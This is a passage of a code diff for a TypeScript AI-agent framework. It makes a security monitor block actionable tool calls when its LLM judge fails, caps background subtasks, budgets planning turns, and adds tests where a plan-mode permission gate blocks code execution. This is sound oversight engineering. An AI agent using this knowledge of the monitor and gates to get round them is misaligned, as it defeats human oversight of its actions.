+ * The verdict when the judge produced no usable answer. Actionable classes
+ * fail closed; `read` fails open. SOFT, because the judge said nothing about
+ * a boundary — the block records that it was not judged, and a retry after
+ * the judge recovers is the right next step.
+ */
+function unjudgedVerdict(
+  category: PermissionCategory,
+  failure: string
+): SecurityVerdict {
+  if (category === "read") return { ...ALLOW_VERDICT };
+  return {
+    block: true,
+    reason: `the security monitor could not judge this action (${failure})`,
+    severity: "high",
+    tier: "soft"
+  };
+}
 
 /** Truncate a string to `max` chars, appending a visible marker when cut. */
 function truncate(text: string, max: number): string {
@@ -286,8 +305,8 @@ export class SecurityMonitor {
 
   /**
    * Judge a single pending action. Returns a {@link SecurityVerdict}. On any
-   * provider error or unparseable output, returns the fail-open ALLOW verdict
-   * and logs a warning (see module header for the rationale).
+   * provider error or unparseable output, returns {@link unjudgedVerdict}: a
+   * block for an actionable category, allow for `read` (see module header).
    */
   async review(action: PendingAction): Promise<SecurityVerdict> {
     let argsJson: string;
@@ -318,21 +337,22 @@ export class SecurityMonitor {
         threadId: this.threadId
       });
     } catch (err) {
-      log.warn("Security monitor judge call failed; allowing by default", {
+      const error = err instanceof Error ? err.message : String(err);
+      log.warn("Security monitor judge call failed", {
         tool: action.name,
         category: action.category,
-        error: err instanceof Error ? err.message : String(err)
+        error
       });
-      return { ...ALLOW_VERDICT };
+      return unjudgedVerdict(action.category, `judge call failed: ${error}`);
     }
 
     const verdict = parseVerdict(extractText(reply.content));
     if (!verdict) {
-      log.warn("Security monitor verdict unparseable; allowing by default", {
+      log.warn("Security monitor verdict unparseable", {
         tool: action.name,
         category: action.category
       });
-      return { ...ALLOW_VERDICT };
+      return unjudgedVerdict(action.category, "verdict unparseable");
     }
 
     if (verdict.block) {

--- a/packages/agents/src/subagent.ts
+++ b/packages/agents/src/subagent.ts
@@ -40,9 +40,14 @@ import type {
   ProcessingContext,
   Release,
   RunBudget,
+  Semaphore,
   TurnBudget
 } from "@nodetool-ai/runtime";
-import { budgetFromContext, isRunBudget } from "@nodetool-ai/runtime";
+import {
+  budgetFromContext,
+  createSemaphore,
+  isRunBudget
+} from "@nodetool-ai/runtime";
 import type { ProcessingMessage, StepResult } from "@nodetool-ai/protocol";
 import type { BackgroundSubtaskRegistry } from "./background-subtasks.js";
 import { CodeActExecutor } from "./codeact/codeact-executor.js";
@@ -55,35 +60,79 @@ import type { Step, Task } from "./types.js";
 import { isString } from "./utils/type-guards.js";
 
 /**
- * Context flag marking that this branch already holds one of the run's
- * concurrency permits.
+ * Context variable holding the permit this branch runs on, as a one-permit
+ * pool its children draw from.
  *
- * The pool is a run total, so a holder that blocks waiting for a *second*
- * permit deadlocks the run: a parent holding the last one while its child
- * queues for another stops both until the deadline. A permit is therefore
- * taken once per branch. `ProcessingContext.copy()` gives every spawn its own
- * variable bag over the same budget object, so siblings each take one and
- * everything below a holder inherits the flag and takes none.
+ * The run's pool is a total, so a holder that blocks waiting for a *second*
+ * permit deadlocks the run: a step holding the last one while its child queues
+ * for another stops both until the deadline. The holder's own permit therefore
+ * counts as one for everything below it — a child takes it while the holder is
+ * idle in the tool call that spawned the child — and only a second concurrent
+ * child borrows from the run pool ({@link branchPool}). `ProcessingContext.copy()`
+ * gives every spawn its own variable bag, so the pool a child finds here is
+ * its parent's, and the one it sets is its own.
  */
-const RUN_SLOT_KEY = "nodetool_run_slot_held";
+const RUN_SLOT_KEY = "nodetool_run_slot";
 
-/** Release for a branch that took no permit because it already holds one. */
-const NO_PERMIT: Release = () => {};
-
-/** Whether this branch already holds one of the run's concurrency permits. */
-export function holdsRunSlot(context: ProcessingContext): boolean {
-  return context.get<boolean>(RUN_SLOT_KEY) === true;
+/**
+ * Take whichever of two pools frees first. The loser's permit, when it
+ * arrives, is handed straight back, so a wait on the pair never holds two.
+ */
+function acquireFirst(pools: readonly Semaphore[]): Promise<Release> {
+  return new Promise<Release>((resolve) => {
+    let won = false;
+    for (const pool of pools) {
+      void pool.acquire().then((release) => {
+        if (won) {
+          release();
+          return;
+        }
+        won = true;
+        resolve(release);
+      });
+    }
+  });
 }
 
 /**
- * Mark this branch as holding a run permit for the fan-outs beneath it, and
- * hand back the undo. Used by a layer that draws permits itself (the DAG
- * executors, which acquire per merged generator) so nothing below it draws a
- * second one.
+ * The pool a nested layer draws from: the permit its branch already holds,
+ * shared by its children one at a time, plus the run's pool beyond it. A
+ * branch holding nothing draws from the run pool alone.
+ */
+export function branchPool(
+  budget: RunBudget,
+  context: ProcessingContext
+): Semaphore {
+  const held = context.get<Semaphore | undefined>(RUN_SLOT_KEY);
+  if (!held) return budget.concurrency;
+  const run = budget.concurrency;
+  return {
+    get permits() {
+      return held.permits + run.permits;
+    },
+    get available() {
+      return held.available + run.available;
+    },
+    get waiting() {
+      return held.waiting + run.waiting;
+    },
+    acquire(): Promise<Release> {
+      if (held.available > 0) return held.acquire();
+      if (run.available > 0) return run.acquire();
+      return acquireFirst([held, run]);
+    }
+  };
+}
+
+/**
+ * Record that this branch now runs on one permit, so the fan-outs beneath it
+ * share that permit and borrow beyond it. Called by a layer that holds a
+ * permit per running node (the step merge) on the node's own context, and by
+ * {@link acquireRunSlot} once a sub-agent has one. Hands back the undo.
  */
 export function markRunSlotHeld(context: ProcessingContext): () => void {
-  const previous = context.get<boolean>(RUN_SLOT_KEY);
-  context.set(RUN_SLOT_KEY, true);
+  const previous = context.get<Semaphore | undefined>(RUN_SLOT_KEY);
+  context.set(RUN_SLOT_KEY, createSemaphore(1));
   let undone = false;
   return () => {
     if (undone) return;
@@ -93,16 +142,16 @@ export function markRunSlotHeld(context: ProcessingContext): () => void {
 }
 
 /**
- * Take one of the run's concurrency permits for this branch, or nothing when
- * the branch already holds one. Returns the release either way, so the caller
- * has one `finally`.
+ * Take a permit for this branch — its parent's when the parent is idle, else
+ * one of the run's — and mark the branch as holding it. Returns the release
+ * either way, so the caller has one `finally`. Unbudgeted runs take nothing.
  */
 export async function acquireRunSlot(
   budget: RunBudget | undefined,
   context: ProcessingContext
 ): Promise<Release> {
-  if (!budget || holdsRunSlot(context)) return NO_PERMIT;
-  const release = await budget.concurrency.acquire();
+  if (!budget) return () => {};
+  const release = await branchPool(budget, context).acquire();
   const undo = markRunSlotHeld(context);
   let released = false;
   return () => {
@@ -254,10 +303,10 @@ export async function* runSubAgent(
   });
 
   let outcome: SubAgentOutcome | null = null;
-  // One of the run's permits for the whole child loop. `start_subtask` detaches
-  // its children, so nothing else bounds a fan-out of twenty of them: the
-  // permit is what keeps the twenty-first from opening a provider conversation
-  // before one of the first two finishes.
+  // A permit for the whole child loop: the parent's own while the parent is
+  // idle in this call, else one of the run's. `start_subtask` detaches its
+  // children, so nothing else bounds a fan-out of them: the permit is what
+  // keeps the next from opening a provider conversation before one finishes.
   const release = await acquireRunSlot(runBudget, opts.context);
   try {
     for await (const msg of executor.execute()) {

--- a/packages/agents/src/task-executor.ts
+++ b/packages/agents/src/task-executor.ts
@@ -12,8 +12,7 @@
 import type {
   BaseProvider,
   ProcessingContext,
-  RunBudget,
-  Semaphore
+  RunBudget
 } from "@nodetool-ai/runtime";
 import {
   budgetFromContext,
@@ -30,7 +29,7 @@ import {
 
 const log = createLogger("nodetool.agents.task-executor");
 import { CodeActExecutor } from "./codeact/codeact-executor.js";
-import { holdsRunSlot, markRunSlotHeld } from "./subagent.js";
+import { branchPool, markRunSlotHeld } from "./subagent.js";
 import {
   ABORTED,
   UNSATISFIABLE_DEPENDENCY,
@@ -102,17 +101,17 @@ export class TaskExecutor {
   private maxConcurrentAgents: number;
   private upstreamMemoryKeys: string[];
   private readonly budget?: RunBudget;
-  /**
-   * The run's permit pool, when this executor is the layer drawing from it.
-   * Set for the length of a run by {@link enterRunSlot}: a nested executor, or
-   * a sub-agent under one of these steps, sees the branch already holding a
-   * permit and takes none, because a holder that queues for a second permit
-   * deadlocks the run.
-   */
-  private mergeSemaphore?: Semaphore;
   private signal?: AbortSignal;
   private readonly sandboxPackages: readonly string[];
   private _finishStepId: string | undefined;
+  /** Steps by id, so settling a node is not a scan of the task per dependency. */
+  private readonly stepsById: Map<string, Step>;
+  /**
+   * Steps whose `step_result` reached the consumer. On abort the merge stops
+   * draining, so a step's own terminal events can land in a queue nobody
+   * reads; {@link settleStep} re-emits them for a step not in this set.
+   */
+  private readonly resultDelivered = new Set<string>();
 
   constructor(opts: TaskExecutorOptions) {
     this.provider = opts.provider;
@@ -131,19 +130,7 @@ export class TaskExecutor {
     this.upstreamMemoryKeys = opts.upstreamMemoryKeys ?? [];
     this.budget = opts.budget ?? budgetFromContext(opts.context);
     this.signal = opts.signal;
-  }
-
-  /**
-   * Claim this branch's run slot for the fan-outs below, and hand back the
-   * undo. A branch already holding one keeps its numeric bound only.
-   */
-  private enterRunSlot(): () => void {
-    if (!this.budget || holdsRunSlot(this.context)) {
-      this.mergeSemaphore = undefined;
-      return () => {};
-    }
-    this.mergeSemaphore = this.budget.concurrency;
-    return markRunSlotHeld(this.context);
+    this.stepsById = new Map(opts.task.steps.map((step) => [step.id, step]));
   }
 
   /**
@@ -151,15 +138,6 @@ export class TaskExecutor {
    * Supports both sequential and parallel execution modes.
    */
   async *executeTasks(): AsyncGenerator<ProcessingMessage> {
-    const leaveRunSlot = this.enterRunSlot();
-    try {
-      yield* this.runSteps();
-    } finally {
-      leaveRunSlot();
-    }
-  }
-
-  private async *runSteps(): AsyncGenerator<ProcessingMessage> {
     // Seed inputs into shared memory so every step sees them. Skip keys that
     // were already seeded by an upstream caller (e.g. ParallelTaskExecutor) to
     // avoid redundant writes and extra subscriber notifications.
@@ -191,9 +169,13 @@ export class TaskExecutor {
 
     yield* scheduleDag<StepNode, ProcessingMessage>({
       nodes: this.stepNodes(),
-      // The branch's pool when this executor is the layer drawing from it,
-      // else a pool of its own so an unbudgeted task is still bounded.
-      concurrency: this.mergeSemaphore ?? createSemaphore(perTask),
+      // A step is a provider conversation, so each running one holds a permit
+      // of the branch's pool: the run's, plus the permit a sub-agent above
+      // this task already holds. Unbudgeted, a pool of the task's own so it is
+      // still bounded.
+      concurrency: this.budget
+        ? branchPool(this.budget, this.context)
+        : createSemaphore(perTask),
       maxConcurrent: perTask,
       signal: this.signal,
       run: (node) => this.runStep(node.step),
@@ -202,7 +184,9 @@ export class TaskExecutor {
       onBlocked: (node, by) =>
         this.failStepEvents(
           node.step,
-          `Step blocked: dependency ${by.id} failed`
+          this.signal?.aborted
+            ? "Step aborted"
+            : `Step blocked: dependency ${by.id} failed`
         )
     });
   }
@@ -279,14 +263,28 @@ export class TaskExecutor {
       .map((step) => step.id);
   }
 
-  /** Run one step and report how it settled. */
+  /**
+   * Run one step and report how it settled.
+   *
+   * The step runs on a context of its own, sharing the task's memory: the
+   * permit the step merge holds for it is recorded there, so a sub-agent the
+   * step spawns finds its parent's permit rather than a sibling's. Messages a
+   * tool posts on that context are forwarded to the task's, where the host
+   * reads them.
+   */
   private async *runStep(
     step: Step
   ): AsyncGenerator<ProcessingMessage, DagRunResult> {
+    const stepContext = this.context.copy({
+      shareMemory: true,
+      inheritMessageListeners: false
+    });
+    stepContext.addMessageListener((msg) => this.context.postMessage(msg));
+    if (this.budget) markRunSlotHeld(stepContext);
     const executor = new CodeActExecutor({
       task: this.task,
       step,
-      context: this.context,
+      context: stepContext,
       provider: this.provider,
       model: this.model,
       tools: this.toolsForStep(step),
@@ -299,7 +297,18 @@ export class TaskExecutor {
       signal: this.signal,
       sandboxPackages: this.sandboxPackages
     });
-    yield* this.withStepLog(step, executor.execute());
+    for await (const msg of this.withStepLog(step, executor.execute())) {
+      yield msg;
+      // Delivered only when the run was still live at the hand-off: once the
+      // signal fires the merge drains nothing more, so a result yielded after
+      // that is in a queue nobody reads.
+      if (msg.type === "step_result" && this.signal?.aborted !== true) {
+        this.resultDelivered.add(step.id);
+      }
+    }
+    // A cancelled run is not a failed step, and must not cascade to its
+    // dependents as one.
+    if (this.signal?.aborted) return { outcome: "failed", error: ABORTED };
     // A step failure does not throw: the executor records it on the step and
     // emits its own terminal events.
     return step.failed
@@ -310,21 +319,24 @@ export class TaskExecutor {
   /**
    * Terminal events for a settled step. A step that ran emitted its own, so
    * this speaks only for one that never did — blocked by a dependency that can
-   * never be satisfied, or cut short by the run's signal.
+   * never be satisfied — or for one the run's signal cut short, whose own
+   * terminal events the abort may have dropped on the way out.
    */
   private settleStep(
     step: Step,
     outcome: DagOutcome,
     reason?: string
   ): ProcessingMessage[] {
-    if (outcome === "ok" || step.completed || step.failed) return [];
+    if (outcome === "ok") return [];
     if (reason === ABORTED) {
-      return this.failStepEvents(step, "Step aborted");
+      return this.resultDelivered.has(step.id)
+        ? []
+        : this.failStepEvents(step, "Step aborted");
     }
-    const blocking = step.dependsOn.filter((dep) => {
-      const dependency = this.task.steps.find((s) => s.id === dep);
-      return dependency?.failed === true;
-    });
+    if (step.completed || step.failed) return [];
+    const blocking = step.dependsOn.filter(
+      (dep) => this.stepsById.get(dep)?.failed === true
+    );
     return this.failStepEvents(
       step,
       blocking.length > 0

--- a/packages/agents/src/task-planner.ts
+++ b/packages/agents/src/task-planner.ts
@@ -9,9 +9,15 @@
 import type {
   BaseProvider,
   ProcessingContext,
-  Message
+  Message,
+  ProviderStop,
+  RunBudget
 } from "@nodetool-ai/runtime";
-import { withAgentSpanGen } from "@nodetool-ai/runtime";
+import {
+  budgetFromContext,
+  isProviderStop,
+  withAgentSpanGen
+} from "@nodetool-ai/runtime";
 import { linkAbort } from "./utils/link-abort.js";
 import { createLogger } from "@nodetool-ai/config";
 import {
@@ -55,6 +61,7 @@ const DEFAULT_PLANNING_SYSTEM_PROMPT = `You are a TaskArchitect. Decompose objec
 ## Structure
 - Task: { id, title, depends_on[], steps[] } — each task runs as an independent sub-agent.
 - Step: { id, instructions, depends_on[], output_schema?, tools? }
+- The LAST step of a task is the task's result: it runs after every sibling step and must consume their results.
 
 ## ID Rules (violations cause retries)
 - Task IDs: descriptive snake_case, e.g. "research_nlp", "write_summary".
@@ -167,6 +174,7 @@ Final result schema (informational — assembled from your tasks' results after 
 
 Remember:
 - Prefix step IDs with their task ID (e.g. "task1_search", "task1_summarize") to avoid collisions.
+- List each task's steps so the last one is the task's result and consumes its siblings.
 - Call add_task for each task in dependency order.
 - Do NOT add an aggregation/synthesis/assemble task — the loop that ran the plan reads each task's result from memory and writes the answer itself.`;
 
@@ -178,6 +186,11 @@ export interface TaskPlannerOptions {
   outputSchema?: Record<string, unknown>;
   inputs?: Record<string, unknown>;
   threadId?: string;
+  /**
+   * The run's budget, consulted before every planning turn. Omitted, the
+   * budget on the context is used; absent there too, planning is unbudgeted.
+   */
+  budget?: RunBudget;
   /** External cancellation. Aborts the planning provider loop mid-flight. */
   signal?: AbortSignal;
 }
@@ -191,6 +204,7 @@ export class TaskPlanner {
   private outputSchema: Record<string, unknown> | undefined;
   private inputs: Record<string, unknown>;
   private threadId?: string;
+  private readonly budget?: RunBudget;
   private signal?: AbortSignal;
 
   constructor(opts: TaskPlannerOptions) {
@@ -210,6 +224,7 @@ export class TaskPlanner {
     this.outputSchema = opts.outputSchema;
     this.inputs = opts.inputs ?? {};
     this.threadId = opts.threadId;
+    this.budget = opts.budget;
     this.signal = opts.signal;
   }
 
@@ -437,7 +452,10 @@ export class TaskPlanner {
       while (uiEvents.length > 0) yield uiEvents.shift() as ProcessingMessage;
     };
 
-    const stream = this.provider.generateLoop({
+    // The run's budget, never a fresh one: planning turns spend the same cap,
+    // deadline and turn count as the steps the plan will run.
+    const budget = this.budget ?? budgetFromContext(context);
+    const loopArgs: Parameters<BaseProvider["generateLoop"]>[0] = {
       messages,
       model: this.model,
       tools: providerTools,
@@ -446,7 +464,11 @@ export class TaskPlanner {
       maxIterations: MAX_CALLS,
       sequentialTools: true,
       signal: abort.signal
-    });
+    };
+    if (budget) loopArgs.turnBudget = budget;
+    const stream = this.provider.generateLoop(loopArgs);
+    // Why the provider loop stopped, when it was not the model ending its turn.
+    let providerStop: ProviderStop | null = null;
 
     try {
       for await (const item of stream) {
@@ -456,6 +478,11 @@ export class TaskPlanner {
         // narrating a retry of the finish_plan call that just succeeded. Drop
         // it instead of showing the user a contradiction.
         if (finished || abortedReason !== null || abort.signal.aborted) break;
+        if (isProviderStop(item)) {
+          providerStop = item;
+          yield* drainUi();
+          continue;
+        }
         // A tool call is announced before it runs — surface it for live display.
         if ("id" in item && "name" in item && "args" in item) {
           const tc = item;
@@ -507,6 +534,28 @@ export class TaskPlanner {
         phase: "complete",
         status: "failed",
         content: abortedReason
+      } satisfies PlanningUpdate;
+      return null;
+    }
+
+    // The loop ran out of something — the run's budget, deadline or turn
+    // count, or the planner's own call cap. Name the limit the budget recorded
+    // rather than reporting a model that "ended without finish_plan".
+    if (providerStop && providerStop.reason !== "aborted") {
+      const detail =
+        providerStop.reason === "budget" || providerStop.reason === "deadline"
+          ? (budget?.exhausted?.detail ?? providerStop.detail)
+          : providerStop.detail;
+      log.warn("Multi-task planning stopped", {
+        reason: providerStop.reason,
+        detail,
+        tasksSoFar: builder.taskCount
+      });
+      yield {
+        type: "planning_update",
+        phase: "complete",
+        status: "failed",
+        content: `Planning stopped after ${builder.taskCount} task(s): ${detail}`
       } satisfies PlanningUpdate;
       return null;
     }

--- a/packages/agents/src/tools/start-subtask-tool.ts
+++ b/packages/agents/src/tools/start-subtask-tool.ts
@@ -43,6 +43,14 @@ export interface StartSubtaskToolOptions extends SubAgentToolRuntime {
 
 const DEFAULT_MAX_ITERATIONS = 20;
 
+/**
+ * Background children one turn may start. The registry is per turn and every
+ * record on it is a detached child loop, so without a cap a model that keeps
+ * calling `start_subtask` grows the registry — and the queue for the run's
+ * permits — without bound.
+ */
+export const MAX_BACKGROUND_SUBTASKS_PER_TURN = 8;
+
 export class StartSubtaskTool extends SubAgentTool {
   readonly name = "start_subtask";
   readonly description = START_SUBTASK_DESCRIPTION;
@@ -125,6 +133,18 @@ export class StartSubtaskTool extends SubAgentTool {
       };
     }
 
+    if (this.registry.size >= MAX_BACKGROUND_SUBTASKS_PER_TURN) {
+      return {
+        error: "background_limit_reached",
+        limit: MAX_BACKGROUND_SUBTASKS_PER_TURN,
+        message:
+          `This turn has already started ${MAX_BACKGROUND_SUBTASKS_PER_TURN} ` +
+          "background subtasks, the most it may. Call wait_subtasks to " +
+          "collect them, or use `run_subtask`, which blocks and returns the " +
+          "result directly."
+      };
+    }
+
     const gate = enterSubAgentDepth(context, this.maxDepth, this.depthNoun);
     if (!gate.ok) return gate.refusal;
 
@@ -148,8 +168,11 @@ export class StartSubtaskTool extends SubAgentTool {
       outputSchema: run.outputSchema,
       systemPrompt: run.systemPrompt,
       maxIterations: run.maxIterations ?? this.maxIterations,
-      // A detached child still spends the parent's allowance, and still draws
-      // one of the run's concurrency permits before it opens a conversation.
+      // A detached child still spends the parent's allowance, and draws a
+      // permit before it opens a conversation: the parent's own when free,
+      // else one of the run's (`acquireRunSlot`). The parent keeps its turn,
+      // so a child on the parent's permit can overlap the parent's next
+      // turn — the cap above is what bounds that.
       turnBudget: this.budget ?? budgetFromContext(context),
       signal: context.signal
     });

--- a/packages/agents/src/tools/tool-permissions.ts
+++ b/packages/agents/src/tools/tool-permissions.ts
@@ -36,6 +36,13 @@ export type ApprovalDecision = "allow" | "allow_for_chat" | "deny";
  * Tool name → category. Anything not listed defaults to `external`, the most
  * conservative class, so a newly-added tool is gated until classified.
  *
+ * A capability's spec is the authority on its category: `capabilityFromTool`
+ * reads the spec first and falls back to this map only for a `Tool` that is
+ * not a capability (`run_node`, the plan-builder tools, `finish_step`). An
+ * entry here for a capability name must agree with its spec — a test walks
+ * every registered spec against this table — and every entry must name a
+ * spec or a surviving `Tool` class.
+ *
  * `read` = no side effects (search, inspect, query, pure compute, internal
  * agent bookkeeping). `write` = mutates local state or produces artifacts /
  * costly media. `execute` = runs arbitrary compute. `external` = third-party
@@ -179,7 +186,6 @@ export const TOOL_PERMISSION_CATEGORIES: Readonly<
   search_email: "read",
   // --- read: knowledge / collections ---
   list_collections: "read",
-  search_collections: "read",
   query_collection: "read",
   vector_text_search: "read",
   vector_hybrid_search: "read",
@@ -195,14 +201,9 @@ export const TOOL_PERMISSION_CATEGORIES: Readonly<
   asset_list: "read",
   create_plan: "read",
   finish_plan: "read",
-  create_task: "read",
   add_task: "read",
   remove_task: "read",
-  finish_task: "read",
   finish_step: "read",
-  finish_graph: "read",
-  add_node: "read",
-  add_edge: "read",
   // run_subtask spawns a child loop whose own tools are gated; the call
   // itself has no side effects, so it always runs.
   run_subtask: "read",

--- a/packages/agents/src/utils/dag-scheduler.ts
+++ b/packages/agents/src/utils/dag-scheduler.ts
@@ -164,13 +164,13 @@ export async function* scheduleDag<N extends DagNode, E>(
 
   function wrap(node: N): AsyncGenerator<E> {
     return (async function* (): AsyncGenerator<E> {
-      let ran = false;
+      let outcome: DagOutcome | null = null;
       try {
         // Nothing past the `yield*` runs when the consumer stops early: an
         // abort leaves this node unsettled on purpose, and the post-run pass
         // settles it with the reason the run actually ended for.
         const result = yield* run(node);
-        const outcome: DagOutcome = result ? result.outcome : "ok";
+        outcome = result ? result.outcome : "ok";
         // Bookkeeping first, and in one uninterrupted stretch: a `yield`
         // hands control to another node's wrapper, which must not see this
         // node half-settled.
@@ -181,8 +181,6 @@ export async function* scheduleDag<N extends DagNode, E>(
           result ? result.error : undefined
         );
         const cascade = outcome === "failed" ? blockDependents(node) : [];
-        if (outcome === "ok") releaseDependents(node);
-        ran = true;
         for (const event of terminal) {
           yield event;
         }
@@ -193,8 +191,15 @@ export async function* scheduleDag<N extends DagNode, E>(
         inFlight--;
         // A node whose generator threw releases nothing: the exception is on
         // its way out of the merge, and this only keeps the stream from
-        // waiting on a node that will never settle.
-        if (ran) startReady();
+        // waiting on a node that will never settle. Dependents are released
+        // here, after the terminal events above, and not before them: a
+        // sibling's `finally` calls `startReady` too, and a dependent pushed
+        // to `ready` before its dependency's settle events were yielded could
+        // start between them.
+        if (outcome !== null) {
+          if (outcome === "ok") releaseDependents(node);
+          startReady();
+        }
         // Every node settled, or nothing left that could start one: either
         // way no further generator will be added, so let the stream end.
         if (inFlight === 0) merge.close();

--- a/packages/agents/tests/author-graph.test.ts
+++ b/packages/agents/tests/author-graph.test.ts
@@ -27,6 +27,8 @@ import {
   type AuthorGraphOptions
 } from "../src/author-graph.js";
 import { GRAPH_DSL_PACKAGE } from "../src/codeact/graph-dsl-package.js";
+import { PERMISSION_GATE_CONTEXT_KEY } from "../src/types.js";
+import type { PermissionGateOptions } from "../src/tools/tool-permissions.js";
 import { shippedPackCatalog } from "../src/evals/codeact-sandbox-pack-cases.js";
 import { createMockContext } from "./_helpers/mock-context.js";
 
@@ -167,6 +169,51 @@ describe("authorGraph belt", () => {
     expect(buildAuthoringBelt(options({ providers: {} })).map((t) => t.name)).not.toContain(
       "find_model"
     );
+  });
+});
+
+describe("authorGraph belt gate", () => {
+  const planGate = (): PermissionGateOptions => ({
+    mode: "plan",
+    sessionAllow: new Set<string>(),
+    requestApproval: async () => "allow"
+  });
+
+  it("blocks run_code under a plan-mode gate handed in explicitly", async () => {
+    const belt = buildAuthoringBelt(options({ gate: planGate() }));
+    const runCode = belt.find((t) => t.name === "run_code");
+    expect(runCode).toBeDefined();
+    const result = await runCode!.process(contextWith(null), {
+      code: "export default () => 1"
+    });
+    expect(result).toMatchObject({ error: "blocked_in_plan_mode" });
+  });
+
+  it("reads the parent run's gate off the context when none is passed", async () => {
+    const context = contextWith(null);
+    context.set(PERMISSION_GATE_CONTEXT_KEY, planGate());
+    const belt = buildAuthoringBelt(options({ context }));
+    const testCode = belt.find((t) => t.name === "test_code");
+    expect(testCode).toBeDefined();
+    const result = await testCode!.process(context, {
+      code: "export default () => 1",
+      cases: []
+    });
+    expect(result).toMatchObject({ error: "blocked_in_plan_mode" });
+  });
+
+  it("does not gate discovery: search_nodes is read-class in plan mode", async () => {
+    const searchable = {
+      ...registry,
+      listMetadata: () => []
+    } as unknown as NodeRegistry;
+    const belt = buildAuthoringBelt(
+      options({ gate: planGate(), registry: searchable })
+    );
+    const search = belt.find((t) => t.name === "search_nodes");
+    expect(search).toBeDefined();
+    const result = await search!.process(contextWith(null), { query: "x" });
+    expect(result).not.toMatchObject({ error: "blocked_in_plan_mode" });
   });
 });
 

--- a/packages/agents/tests/capabilities-agents.test.ts
+++ b/packages/agents/tests/capabilities-agents.test.ts
@@ -17,6 +17,7 @@ import { describe, expect, it, vi } from "vitest";
 import {
   AgentMemory,
   BaseProvider,
+  createRunBudget,
   memoryKeys,
   ProcessingContext
 } from "@nodetool-ai/runtime";
@@ -47,6 +48,7 @@ import { createMockContext } from "./_helpers/mock-context.js";
 import { isString } from "../src/utils/type-guards.js";
 import { RunSearchTool } from "../src/tools/run-search-tool.js";
 import { StartSubtaskTool } from "../src/tools/start-subtask-tool.js";
+import { createLoopingMockProvider } from "./_helpers/looping-mock-provider.js";
 
 function makeCtx(): ProcessingContext {
   return new ProcessingContext({ jobId: "test-job", userId: "test" });
@@ -458,6 +460,53 @@ describe("create_plan", () => {
     ).rejects.toThrow(/create_plan/);
   });
 
+  it("plans against the run's budget, and names it when it refuses", async () => {
+    // Planning turns are turns of the run. A budget with no room admits none,
+    // and the model is told which limit stopped it rather than that the
+    // objective was too vague.
+    const budget = createRunBudget({
+      capUsd: 0,
+      maxOutputTokens: 1_000,
+      unpricedTokenCeiling: 0,
+      deadlineMs: Infinity,
+      maxConcurrency: 4,
+      maxTurns: 50
+    });
+    const provider = createLoopingMockProvider(
+      [[{ id: "c1", name: "finish_plan", args: { title: "A Plan" } }]],
+      { provider: "openai", repeatLast: true }
+    );
+    const forwarded: ProcessingMessage[] = [];
+    const result = (await createPlan.impl(
+      createCapabilityRun({
+        context: makeCtx(),
+        gate: UNGATED,
+        subAgent: stubRuntime({
+          provider,
+          model: "gpt-4o-mini",
+          budget,
+          forwardMessage: (msg) => {
+            forwarded.push(msg);
+          }
+        })
+      }),
+      { objective: "Do the thing" }
+    )) as Record<string, unknown>;
+
+    expect(result["error"]).toBe("plan_failed");
+    expect(String(result["message"])).toContain("turn budget");
+    expect(provider.turnsStarted).toBe(0);
+    expect(budget.exhausted?.kind).toBe("cost");
+    expect(
+      forwarded.some(
+        (m) =>
+          m.type === "planning_update" &&
+          m.status === "failed" &&
+          String(m.content).includes("turn budget")
+      )
+    ).toBe(true);
+  });
+
   it("reports a planner that commits nothing instead of inventing a plan", async () => {
     const silent = {
       provider: "silent",
@@ -637,6 +686,13 @@ describe("execute_plan", () => {
       "draft",
       "gather"
     ]);
+    // And every step's own, keyed by step id, so what a sibling of the
+    // finish step produced is not lost behind the task result.
+    expect(result["steps"]).toEqual({
+      gather_read: "did gather_read",
+      draft_write: "did draft_write"
+    });
+    expect(result["error"]).toBeUndefined();
     // The run streams: the thread sees each task resolve as it happens.
     expect(forwarded.some((m) => m.type === "task_update")).toBe(true);
   });
@@ -649,6 +705,11 @@ describe("execute_plan", () => {
     expect(result["executed"]).toBe(true);
     expect(result["completed_count"]).toBe(0);
     expect(result["failed_count"]).toBe(2);
+    // Nothing succeeded, so the call is an error the model cannot mistake for
+    // a deliverable — one that still carries every task's failure.
+    expect(result["error"]).toBe("plan_failed");
+    expect(String(result["message"])).toContain("gather_read");
+    expect(String(result["message"])).toContain("draft");
     const tasks = result["tasks"] as Array<Record<string, unknown>>;
     expect(tasks[0]["status"]).toBe("failed");
     expect(tasks[0]["error"]).toContain("gather_read");
@@ -663,6 +724,37 @@ describe("execute_plan", () => {
         (m) => m.type === "task_update" && m.event === "task_failed"
       )
     ).toBe(true);
+  });
+
+  it("is not an error while any task succeeded", async () => {
+    // Two independent tasks, one failing: a partial result, not `plan_failed`.
+    const plan = {
+      title: "Half",
+      tasks: [
+        {
+          id: "gather",
+          title: "Gather",
+          depends_on: [],
+          steps: [
+            { id: "gather_read", instructions: "STEP:gather_read", depends_on: [] }
+          ]
+        },
+        {
+          id: "draft",
+          title: "Draft",
+          depends_on: [],
+          steps: [
+            { id: "draft_write", instructions: "STEP:draft_write", depends_on: [] }
+          ]
+        }
+      ]
+    };
+    const { result } = await runPlan(plan, { failing: ["gather_read"] });
+
+    expect(result["error"]).toBeUndefined();
+    expect(result["completed_count"]).toBe(1);
+    expect(result["failed_count"]).toBe(1);
+    expect(Object.keys(result["steps"] as object)).toEqual(["draft_write"]);
   });
 
   it("says so when a completed task left no result under its `task:<id>` key", async () => {

--- a/packages/agents/tests/codeact-action-span.test.ts
+++ b/packages/agents/tests/codeact-action-span.test.ts
@@ -1,0 +1,170 @@
+/**
+ * Every `execute_code` action is one `agent.action` span under the step's
+ * `agent.step` span, carrying what an analyzer needs to read a run: code
+ * length, duration, bridged tool-call count, outcome, and whether the
+ * observation was cut.
+ */
+import { describe, it, expect, beforeAll, afterAll } from "vitest";
+import { mkdtemp, readFile, rm } from "node:fs/promises";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import {
+  initTelemetry,
+  shutdownTelemetry,
+  type BaseProvider,
+  type ProviderStreamItem,
+  type ToolCall,
+  type TraceRecord
+} from "@nodetool-ai/runtime";
+import { CodeActExecutor } from "../src/codeact/codeact-executor.js";
+import { Tool } from "../src/tools/base-tool.js";
+import type { Step, Task } from "../src/types.js";
+import { createMockContext } from "./_helpers/mock-context.js";
+
+class AddTool extends Tool {
+  readonly name = "add";
+  readonly description = "Add two numbers.";
+  protected override readonly jsonSchema = {
+    type: "object",
+    properties: { a: { type: "number" }, b: { type: "number" } },
+    required: ["a", "b"]
+  };
+  async process(
+    _context: unknown,
+    params: Record<string, unknown>
+  ): Promise<unknown> {
+    return { sum: Number(params["a"]) + Number(params["b"]) };
+  }
+}
+
+function createLoopProvider(turns: ToolCall[][]): BaseProvider {
